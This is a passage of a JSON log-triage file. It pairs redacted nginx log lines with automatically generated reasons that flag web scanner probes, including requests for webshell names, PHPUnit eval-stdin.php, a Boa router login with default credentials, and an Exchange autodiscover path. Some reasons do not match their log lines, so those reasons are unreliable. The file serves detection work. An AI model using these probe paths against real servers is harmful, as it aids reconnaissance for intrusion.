\"/usr/share/nginx/default/w3lls.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /w3lls.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:18.483350873Z" }, "81cb99ef38e9f973fa23c5dc42ec47b640f7ac3f13d86093be6ad85d411d693c": { "type": "hash", "value": "81cb99ef38e9f973fa23c5dc42ec47b640f7ac3f13d86093be6ad85d411d693c", "source": "auto", "reason": "An nginx error indicating a missing file, which could indicate misconfiguration or probing but is not clearly malicious.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/file.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /file.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:54.728225807Z" }, "83ae5f0eab935e85ba779a444affcfb5acddd2e9cffa4a72449a62ec82e6df92": { "type": "hash", "value": "83ae5f0eab935e85ba779a444affcfb5acddd2e9cffa4a72449a62ec82e6df92", "source": "auto", "reason": "Automated access with a blocked robots.txt response from a known bot user-agent (OAI-SearchBot).May indicate bot scanning or probing activity.", "original_line": "\"media-api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 403 325 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:09:31.658930842Z" }, "8472978188dd9ea70b3ceac89a57a588c33fde4d3cfd6583e9d85473a2cdf970": { "type": "hash", "value": "8472978188dd9ea70b3ceac89a57a588c33fde4d3cfd6583e9d85473a2cdf970", "source": "auto", "reason": "Open() failed for cu.php in nginx default directory suggests probing for a PHP file, common during vulnerability scanning or misconfigured requests.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/cu.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /cu.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:47.687914598Z" }, "858ca66d2ca2fb86f8ab63772732ba2ab64c78576a1bfb56e5dd15f7ba9c219d": { "type": "hash", "value": "858ca66d2ca2fb86f8ab63772732ba2ab64c78576a1bfb56e5dd15f7ba9c219d", "source": "auto", "reason": "Error log shows an attempt to access a PHP file that does not exist, which can indicate probing or misconfiguration. Not conclusively malicious, but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/bgymj.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /bgymj.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:47.902617686Z" }, "85b84d499e569ca874930276ef3ad216dc95a519c3103136b573990653cbc891": { "type": "hash", "value": "85b84d499e569ca874930276ef3ad216dc95a519c3103136b573990653cbc891", "source": "auto", "reason": "NGINX error showing missing file grsiuk.php accessed by a client; could indicate a probing or misconfigured site attempting to access non-existent resources.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/grsiuk.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /grsiuk.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:24.418642092Z" }, "86945972dccbb00b120803f5a8d59f77303007cdcb21f8aa12cd9db5bee569d9": { "type": "hash", "value": "86945972dccbb00b120803f5a8d59f77303007cdcb21f8aa12cd9db5bee569d9", "source": "auto", "reason": "Probe-like request for a PHP file that does not exist, which could indicate attempting to discover vulnerable scripts.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/lm15.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /lm15.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:29.918477974Z" }, "87ed0896ec104300869d475c9ca70e6a96d1b95c090c64d0f9eaa096e5df133f": { "type": "hash", "value": "87ed0896ec104300869d475c9ca70e6a96d1b95c090c64d0f9eaa096e5df133f", "source": "auto", "reason": "HTTP request for a PHP file (tt.php) resulting in a missing file error; could indicate probing for vulnerable files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/tt.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /tt.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:48.314392683Z" }, "8b61c5e5e6486282cd6c0bce22163ca5c29c22b744434f421e0f061dc63716b2": { "type": "hash", "value": "8b61c5e5e6486282cd6c0bce22163ca5c29c22b744434f421e0f061dc63716b2", "source": "auto", "reason": "Access attempt to a PHPUnit file path is commonly associated with automated probes for known vulnerabilities; not successful but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:42.760432537Z" }, "8bf995ffd765ee7662cb6cd2c1506e5859e7fca52546ef06b361db42b0a1d1dc": { "type": "hash", "value": "8bf995ffd765ee7662cb6cd2c1506e5859e7fca52546ef06b361db42b0a1d1dc", "source": "auto", "reason": "Standard nginx error log showing a 404-like missing file (155.php) under /usr/share/nginx/default and a client request for /155.php. Could indicate probing for PHP files or misconfigured routing, but not clearly malicious on its own.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/155.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /155.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:15.333769071Z" }, "8ce671ef87f112cd4db04becee9377172cfca14e1e24c2da382452c197f1c6c3": { "type": "hash", "value": "8ce671ef87f112cd4db04becee9377172cfca14e1e24c2da382452c197f1c6c3", "source": "auto", "reason": "An HTTP request sequence log shows an attempted access to a PHP file that does not exist, which can be part of a scan or probing activity targeting common web app files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/xsas.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /xsas.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:10.213574184Z" }, "8e7f8cf951a12a465480fa5d1fb62cb448cf1790d87f0d96eb758637b7fcec16": { "type": "hash", "value": "8e7f8cf951a12a465480fa5d1fb62cb448cf1790d87f0d96eb758637b7fcec16", "source": "auto", "reason": "Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration.", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 404 9 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T06:40:33.108881288Z" }, "941b1fb2c12d7af5278ad1fe8eb87318ef32e6926037039bdd36396bac59e251": { "type": "hash", "value": "941b1fb2c12d7af5278ad1fe8eb87318ef32e6926037039bdd36396bac59e251", "source": "auto", "reason": "Accessing a phpunit license path under vendor suggests probing for phpunit in web root, a common web exploit pattern to locate vulnerable components.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vendor/phpunit/phpunit/LICENSE/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:44.450147528Z" }, "9eb19e2e86d141ab231ab2233091b7fc9f467884be2cb2aeebf83340b7f0b6c7": { "type": "hash", "value": "9eb19e2e86d141ab231ab2233091b7fc9f467884be2cb2aeebf83340b7f0b6c7", "source": "auto", "reason": "HTTP 400 on GET / with a user agent pointing to a scanning domain; multiple potential indicators of automated scanning", "original_line": "\"54.200.221.0\" \"\u003cVAR\u003e\" 400 650 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T16:12:52.757354246Z" }, "a1faade401d0c7ce0753ed395849755bbc158035225f26e34596cf6f5299286c": { "type": "hash", "value": "a1faade401d0c7ce0753ed395849755bbc158035225f26e34596cf6f5299286c", "source": "auto", "reason": "Attempted access to wp-the.php indicates probing for WordPress-related files; could be vulnerability reconnaissance. Not clearly malicious on its own but warrants alert.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-the.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-the.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:41.138047187Z" }, "a31ad456687395c49b47ddf966fc90d6f2f528d0c38d87b07f389df57e103bf5": { "type": "hash", "value": "a31ad456687395c49b47ddf966fc90d6f2f528d0c38d87b07f389df57e103bf5", "source": "auto", "reason": "Error while opening a file requested by a client; could indicate probing for non-existent PHP file or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/xwx1.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /xwx1.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:28.420268227Z" }, "a5456c0663601934a9d0c14854ff97550cd69d7e9cf403392fc6a157ba16d549": { "type": "hash", "value": "a5456c0663601934a9d0c14854ff97550cd69d7e9cf403392fc6a157ba16d549", "source": "auto", "reason": "HTTP request to a likely sensitive PHP file that does not exist, indicating probing/scan behavior against the web server.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/bnm.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /bnm.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:46.392404248Z" }, "a8fd3cd6765446010099996f2dbd8233265f9e465f3aa3a55df7c4817e2cef15": { "type": "hash", "value": "a8fd3cd6765446010099996f2dbd8233265f9e465f3aa3a55df7c4817e2cef15", "source": "auto", "reason": "An error log showing an attempt to open a non-existent PHP file (666.php) from a client IP may indicate probing or malicious activity against the nginx server.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/666.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /666.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:21.097120897Z" }, "a96c7869e1b8d5b693834864d9b216783d5e794f7435813d8a2d387a23450d80": { "type": "hash", "value": "a96c7869e1b8d5b693834864d9b216783d5e794f7435813d8a2d387a23450d80", "source": "auto", "reason": "An HTTP request to /wp9.php resulted in a file not found error, indicating probing for PHP files often associated with Magento/WordPress reconnaissance", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp9.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp9.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:20.955297313Z" }, "aa54cb6ff1650368e38eae52c40b0ed2b64265a68168d553fadbfff068b579d0": { "type": "hash", "value": "aa54cb6ff1650368e38eae52c40b0ed2b64265a68168d553fadbfff068b579d0", "source": "auto", "reason": "Attempted access to phpunit path suggests probing for known PHP unit vulnerabilities.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:20.032619068Z" }, "ae02718953b651634f6a7bd2b67409da16fb80ece92d4e0dabec601c4471e796": { "type": "hash", "value": "ae02718953b651634f6a7bd2b67409da16fb80ece92d4e0dabec601c4471e796", "source": "auto", "reason": "Open() failed for a non-existent file during an HTTP GET for byypas.php, indicative of probing for webshells or misconfigured paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/byypas.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /byypas.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:03.836657723Z" }, "ae61a7aab448da0aec29253ce3615c9ba0a9e6e4f21a8036cb488bf0b5c6e193": { "type": "hash", "value": "ae61a7aab448da0aec29253ce3615c9ba0a9e6e4f21a8036cb488bf0b5c6e193", "source": "auto", "reason": "Access to a PHP unit test file path that does not exist suggests probing for phpunit exposure; not definitive compromise but warrants alert.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:47.912268598Z" }, "ae9b8aff5b4226a3922c95f923667708957d8db0ff8c5c8f02317aae9567c4e8": { "type": "hash", "value": "ae9b8aff5b4226a3922c95f923667708957d8db0ff8c5c8f02317aae9567c4e8", "source": "auto", "reason": "Request to tfm.php under nginx with missing file indicates potential probing or local file inclusion attempt; multiple such probes can precede an attack.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/tfm.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /tfm.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:23.230236975Z" }, "af79cc19f2d1b2a73a0e1e428cd8279a8a02e44f8ce69fd19315a196afc11a43": { "type": "hash", "value": "af79cc19f2d1b2a73a0e1e428cd8279a8a02e44f8ce69fd19315a196afc11a43", "source": "auto", "reason": "Access to /boaform/admin/formLogin with username and password parameters suggests credential stuffing or probing for login forms on a web interface.", "original_line": "\"_\" \"\u003cVAR\u003e\" 404 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T06:55:33.087008035Z" }, "b1afd80f477d49a748ec557772873b9fd3e2d585eebd32fe2977d31547024fa9": { "type": "hash", "value": "b1afd80f477d49a748ec557772873b9fd3e2d585eebd32fe2977d31547024fa9", "source": "auto", "reason": "Error log shows a request targeting /wwx.php resulting in a missing file, which can indicate probing for vulnerable PHP files or misconfigurations.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wwx.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wwx.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:47.155040795Z" }, "b1d3305451e5fa6a23d92db5921d6ba75ddae1ee07f00a2676106efce7cbb620": { "type": "hash", "value": "b1d3305451e5fa6a23d92db5921d6ba75ddae1ee07f00a2676106efce7cbb620", "source": "auto", "reason": "An error log showing a request to a non-existent PHP file (jga.php) with a distinctive connection and client IP may indicate probing or attempted access to server resources.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/jga.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /jga.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:16.19999132Z" }, "b1e53fc52464d2889550d5794a74c3ac425b950f022fd840376aad0376f1b8e4": { "type": "hash", "value": "b1e53fc52464d2889550d5794a74c3ac425b950f022fd840376aad0376f1b8e4", "source": "auto", "reason": "Access to a path containing +CSCOE+ in an nginx error log is unusual and may indicate probing for vulnerable Cisco components or misconfigured paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/+CSCOE+/logon.html\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /+CSCOE+/logon.html HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T09:19:26.934645168Z" }, "b36a58e109a51e6abb0e35f51e6991df6e053f1a7b72c5f797267a5726112db1": { "type": "hash", "value": "b36a58e109a51e6abb0e35f51e6991df6e053f1a7b72c5f797267a5726112db1", "source": "auto", "reason": "An error log showing a missing file a5.php being requested suggests probing for PHP assets; could be benign misconfiguration or a light probe", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/a5.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /a5.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:51.014596463Z" }, "b3b3e56623972c219acf1cb377ee8ce25a521575c1175ba58d78c0203ae20d2d": { "type": "hash", "value": "b3b3e56623972c219acf1cb377ee8ce25a521575c1175ba58d78c0203ae20d2d", "source": "auto", "reason": "An access attempt to a PHP file (xff.php) that does not exist; could indicate probing for sensitive files or misconfigured routing.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/xff.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /xff.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:42.62777365Z" }, "b3e46ee0d70dcbe1dc9ef379a07dad3ab5c897e128c56f9b35735df067b0ead2": { "type": "hash", "value": "b3e46ee0d70dcbe1dc9ef379a07dad3ab5c897e128c56f9b35735df067b0ead2", "source": "auto", "reason": "Error log shows an access to a likely non-existent PHP file (probe-like pattern) which could indicate probing for vulnerable assets.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/44.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /44.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:56.233428433Z" }, "b4c0992ba13c8f9247053e1fe4ad39cf3ea276d2681d033b6340005ade652012": { "type": "hash", "value": "b4c0992ba13c8f9247053e1fe4ad39cf3ea276d2681d033b6340005ade652012", "source": "auto", "reason": "Open() failure for a PHP file in a web server context can indicate missing resource or probing for vulnerable paths; not definitively malicious but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/a4.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /a4.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:14.2447573Z" }, "b6f82cc9b941fb83baa3b3d1949f78bc098e95a5a6470209983743728e9c5e42": { "type": "hash", "value": "b6f82cc9b941fb83baa3b3d1949f78bc098e95a5a6470209983743728e9c5e42", "source": "auto", "reason": "nginx error showing missing file for a requested PHP resource (vanda.php) from a client IP. Could indicate probing for vulnerable file paths or misconfig, though may also be benign.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vanda.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vanda.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:03.825269008Z" }, "b7bb3be52c54ebc7c287fdc504b2aff04aa779d357fc409b03abbf2aeee29c21": { "type": "hash", "value": "b7bb3be52c54ebc7c287fdc504b2aff04aa779d357fc409b03abbf2aeee29c21", "source": "auto", "reason": "An HTTP GET request to a PHP file that likely doesn't exist (RIP.php) appears to be probing for a potential PHP file on the web server. This pattern is commonly associated with automated vulnerability scanning or probing activity.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/RIP.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /RIP.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:26.770554817Z" }, "b82d9e901e23a87b7bc10a3a748809c3816580ac67d9345adec1cfd6d96007c1": { "type": "hash", "value": "b82d9e901e23a87b7bc10a3a748809c3816580ac67d9345adec1cfd6d96007c1", "source": "auto", "reason": "Request attempts to access a WordPress file (wp-blogs.php) resulting in a missing file error; could indicate probing for vulnerable paths though not definitive malicious activity.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-blogs.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-blogs.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:08.880207835Z" }, "b8711453a697b92b466aae0a0365c5aaeb695cc4d1f8eb30a24d7df53abca38c": { "type": "hash", "value": "b8711453a697b92b466aae0a0365c5aaeb695cc4d1f8eb30a24d7df53abca38c", "source": "auto", "reason": "An nginx open() error indicates a missing file for a requested path, which is common in misconfigured routes or probing but not necessarily malicious by itself.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/portal/redlion\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /portal/redlion HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T03:17:34.262872777Z" }, "ba95a8e86fca7d625c2e00239958015479790373db4a43bd4d08617007098a59": { "type": "hash", "value": "ba95a8e86fca7d625c2e00239958015479790373db4a43bd4d08617007098a59", "source": "auto", "reason": "An access attempt to /admin/index.php resulted in a missing file error, which can indicate probing for admin interfaces.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/admin/index.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /admin/index.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:20.139983985Z" }, "bacc0416364ea3bee6a009cc81513da83513e39f22e6fc733d2b3cc7e15de876": { "type": "hash", "value": "bacc0416364ea3bee6a009cc81513da83513e39f22e6fc733d2b3cc7e15de876", "source": "auto", "reason": "Access to /boaform/admin/formLogin with username parameter suggests an automated attempt to probe for vulnerable admin interfaces or login forms. Not confirmed malicious, but notable.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/boaform/admin/formLogin\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /boaform/admin/formLogin?username=user\u0026psd=user HTTP/1.0\"", "created_at": "2026-03-20T06:55:29.783100218Z" }, "baf87647a9cf4c9bb3c0268e97e1300c42f95555533ac2b68de70201b157c4bc": { "type": "hash", "value": "baf87647a9cf4c9bb3c0268e97e1300c42f95555533ac2b68de70201b157c4bc", "source": "auto", "reason": "Access to a PHP file sa.php7 returning 404 from a public domain; could indicate probing or misconfiguration.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 404 6622 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T12:46:15.005835801Z" }, "bc2509bceada820e5a5955885c82489f89ddfa9bc89663d53603f261300ebc84": { "type": "hash", "value": "bc2509bceada820e5a5955885c82489f89ddfa9bc89663d53603f261300ebc84", "source": "auto", "reason": "Nginx error shows a GET to /developmentserver/metadatauploader with a missing file; could indicate probing for a metadata uploader endpoint.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/developmentserver/metadatauploader\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /developmentserver/metadatauploader HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T00:09:08.130497905Z" }, "bc5549c32e614b0c992e7e2c961e6965371332485843883eeb5e4932313c85c3": { "type": "hash", "value": "bc5549c32e614b0c992e7e2c961e6965371332485843883eeb5e4932313c85c3", "source": "auto", "reason": "Request to non-existent PHP file (rzki.php) and open() failure indicates probing for files; could indicate an attacker attempting to discover exploitable paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/rzki.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /rzki.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:29.48674062Z" }, "bc73489babbe085fed6d4ceb5ecbb77313a5685dab3b18fc4e7c84078091992b": { "type": "hash", "value": "bc73489babbe085fed6d4ceb5ecbb77313a5685dab3b18fc4e7c84078091992b", "source": "auto", "reason": "Error log shows an attempt to access inputs.php with missing file, which can indicate probing or misconfigured routing; not clearly malicious but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/inputs.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /inputs.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:20.923445934Z" }, "be8dd303936c5fbee150dd8676f41e162c98bc14de9b3819359f11a4af571778": { "type": "hash", "value": "be8dd303936c5fbee150dd8676f41e162c98bc14de9b3819359f11a4af571778", "source": "auto", "reason": "Access to wp-blog.php and missing file suggests probing for WordPress vulnerability or misconfiguration; not definitive malware but warrants alert.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-blog.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-blog.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:37.056353168Z" }, "be906fc57f63af818e30e6840c614b1cfcf3e6d5facb0b46fd83fd63bc067441": { "type": "hash", "value": "be906fc57f63af818e30e6840c614b1cfcf3e6d5facb0b46fd83fd63bc067441", "source": "auto", "reason": "Access to a PHP file (lib.php) that does not exist may indicate probing for vulnerable endpoints or misconfigured app files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/lib.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /lib.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:40.667593473Z" }, "c0afac0e87a60bf33b56a26592f8303f20db9e703d8cf859f95020bd982fcab0": { "type": "hash", "value": "c0afac0e87a60bf33b56a26592f8303f20db9e703d8cf859f95020bd982fcab0", "source": "auto", "reason": "An error referencing a non-existent PHP file (ccs.php) in an HTTP request could indicate an attempted access to a potentially sensitive resource or a probe for vulnerable PHP files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ccs.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ccs.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:08.122092189Z" }, "c21622c0e5540ea6cb31f5a2af4d4562817331d22fbde51a84d712a79aa274a1": { "type": "hash", "value": "c21622c0e5540ea6cb31f5a2af4d4562817331d22fbde51a84d712a79aa274a1", "source": "auto", "reason": "Nginx error log shows an attempted fetch of /autodiscover/autodiscover.json with a PowerShell-encoded query string, triggering file open failures (possible probing for vulnerable autodiscover endpoints).", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/autodiscover/autodiscover.json\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-19T22:33:20.471692784Z" }, "c2e602afbd13e39a5f8f5896943f89064e10ad854028a706032a18f8531f6d12": { "type": "hash", "value": "c2e602afbd13e39a5f8f5896943f89064e10ad854028a706032a18f8531f6d12", "source": "auto", "reason": "External client attempting to access a suspicious PHP unit file path (vendor/phpunit/phpunit/Util/PHP/eval-stdin.php) on an nginx server. This mirrors common probing for phpunit vulnerabilities.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:25.922476627Z" }, "c5b3b8959850e8e9dffb7f33dd4bf21bd9d66f4ad4c11b3e04a165583601c6a6": { "type": "hash", "value": 